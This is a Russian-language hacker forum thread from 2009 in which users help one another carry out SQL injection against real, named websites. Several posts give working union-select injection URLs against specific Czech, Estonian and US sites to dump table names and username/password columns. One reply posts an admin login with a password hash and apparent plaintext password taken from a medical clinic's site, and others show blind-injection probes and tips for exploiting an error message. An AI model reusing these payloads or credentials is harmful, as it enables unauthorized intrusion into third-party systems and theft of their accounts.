16.03.2009, 19:38
|
|
Banned
Регистрация: 20.06.2008
Сообщений: 296
С нами:
9416045
Репутация:
126
|
|
F4R, http://www.vurv.cz/index.php?key=section&id=5+union+select+null,null, null,null,table_name+f rom+information_schema.tables
спс Держи ++++
|
|
|
17.03.2009, 03:04
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
http://dental.medicum.ee/index.php?sisu=tekst&mid=109
-109+union+select+concat_ws(kasutajanimi,0x3a,passw ord) from kasutajad--
Таблица есть,но данные не выбираются.Количество полей верно.Я так понял,что она пустая ?
|
|
|
|
17.03.2009, 15:04
|
|
Познающий
Регистрация: 14.01.2009
Сообщений: 93
С нами:
9116636
Репутация:
39
|
|
Сообщение от Велемир
http://dental.medicum.ee/index.php?sisu=tekst&mid=109
-109+union+select+concat_ws(kasutajanimi,0x3a,passw ord) from kasutajad--
Таблица есть,но данные не выбираются.Количество полей верно.Я так понял,что она пустая ?
не ответ на вопрос, но вроде неправильно использована ф-я CONCAT_WS(separator,str1,str2,...)
http://dev.mysql.com/doc/refman/5.0/en/string-functions.html#function_concat-ws
|
|
|
|
17.03.2009, 12:56
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
С нами:
10339586
Репутация:
1396
|
|
http://dental.medicum.ee/index.php?sisu=tekst&mid=109
-109+union+select+concat_ws(kasutajanimi,0x3a,passw ord) from kasutajad--
Таблица есть,но данные не выбираются.Количество полей верно.Я так понял,что она пустая ?
table admin_login
admin:de5b25fb43c11d610a26449661dd28c8:lasesisse
видимо да, пустая твоя табличка.
Последний раз редактировалось $n@ke; 17.03.2009 в 13:00..
|
|
|
|
17.03.2009, 15:29
|
|
Новичок
Регистрация: 14.01.2009
Сообщений: 2
С нами:
9116602
Репутация:
0
|
|
На запрос www.......&sid=115' в браузере ваваливается следующее:
Can not select table: SELECT * FROM ofagp WHERE id=115\' and enable=1 and language=2 ORDER BY od asc
Подскажите что здесь можно сделать чтобы раскрутить sql инъекцию?
|
|
|
|
17.03.2009, 15:46
|
|
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
С нами:
9116712
Репутация:
688
|
|
Сообщение от Nuke
На запрос www.......&sid=115' в браузере ваваливается следующее:
Can not select table: SELECT * FROM ofagp WHERE id=115\' and enable=1 and language=2 ORDER BY od asc
Подскажите что здесь можно сделать чтобы раскрутить sql инъекцию?
читай тут - http://forum.antichat.ru/thread43966.html
и тут - http://forum.antichat.ru/thread104591.html
и вообще много статей про Sql inj
|
|
|
|
17.03.2009, 18:19
|
|
Познающий
Регистрация: 23.05.2008
Сообщений: 84
С нами:
9456679
Репутация:
97
|
|
У кого опыта побольше,помогите плиз раскрутить скулю, уже минут 30 бьюсь, безрезультатно... :'(
http://texeyes.com/contact.php?d=5'
|
|
|
|
17.03.2009, 18:39
|
|
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
С нами:
9837719
Репутация:
466
|
|
слепая походу!
http://texeyes.com/contact.php?d=5%27+and+1=2
http://texeyes.com/contact.php?d=5%27+and+1=1
разные ответы
|
|
|
|
17.03.2009, 18:43
|
|
Познающий
Регистрация: 23.05.2008
Сообщений: 84
С нами:
9456679
Репутация:
97
|
|
Сообщение от Rubaka
слепая походу!
http://texeyes.com/contact.php?d=5%27+and+1=2
http://texeyes.com/contact.php?d=5%27+and+1=1
разные ответы
А разве может быть слепая, если ошибка вываливается? o_O
Это ты показал, что скуля вообще есть, а то что она есть я и так знаю, исходя из ошибки 
|
|
|
|
17.03.2009, 18:44
|
|
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
С нами:
9361870
Репутация:
58
|
|
2Imperou$
http://texeyes.com/contact.php?d=5+and+1=1/* получилась тока слепая скуля)
))) что ты понимаешь под слепой скулей?) то что ее на ощупь нада раскручивать одной интуицией где даже ошибки не выводятся?)
Последний раз редактировалось j0ker13; 17.03.2009 в 18:47..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
